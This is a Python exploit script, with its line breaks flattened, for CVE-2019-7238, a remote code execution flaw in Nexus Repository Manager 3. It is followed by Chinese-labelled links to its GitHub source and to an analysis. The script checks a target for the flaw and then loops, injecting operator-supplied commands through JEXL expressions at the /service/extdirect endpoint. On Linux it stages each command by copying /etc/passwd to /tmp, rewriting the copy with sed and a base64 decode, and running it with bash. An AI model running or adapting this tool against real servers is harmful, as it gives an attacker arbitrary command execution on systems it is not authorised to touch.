from requests.packages.urllib3.exceptions import InsecureRequestWarning import urllib3 import requests import base64 import json import sys print("\nNexus Repository Manager 3 Remote Code Execution - CVE-2019-7238 \nFound by @Rico and @voidfyoo\n") proxy = { } remote = 'http://127.0.0.1:8081' ARCH="LINUX" # ARCH="WIN" requests.packages.urllib3.disable_warnings(InsecureRequestWarning) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def checkSuccess(r): if r.status_code == 200: json_data = json.loads(r.text) if json_data['result']['total'] > 0: print("OK") else: print("KO") sys.exit() else: print("[-] Error status code", r.status_code) sys.exit() print("[+] Checking if Content-Selectors exist =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==1"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print("") while True: try: if ARCH == "LINUX": command = input("command (not reflected)> ") command = base64.b64encode(command.encode('utf-8')) command_str = command.decode('utf-8') command_str = command_str.replace('/', '+') print("[+] Copy file to temp directory =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"cp /etc/passwd /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print("[+] Preparing temp file =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1cpwn2 /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print("[+] Cleaning temp file =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i /[^pwn2]/d /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print("[+] Writing command into temp file =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1s/pwn2/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print("[+] Decode base64 command =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print("[+] Executing command =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash pwn.txt\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print('') else: command = input("command (not reflected)> ") print("[+] Executing command =>", end=' ') burp0_url = remote + "/service/extdirect" burp0_headers = {"Content-Type": "application/json"} burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"" + command + "\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False) checkSuccess(r) print('') except KeyboardInterrupt: print("Exiting...") break
腳本地址:https://github.com/mpgn/CVE-2019-7238/blob/master/CVE-2019-7238.pyjava
漏洞分析:https://cert.360.cn/report/detail?id=3ec687ec01cccd0854e2706590ddc215python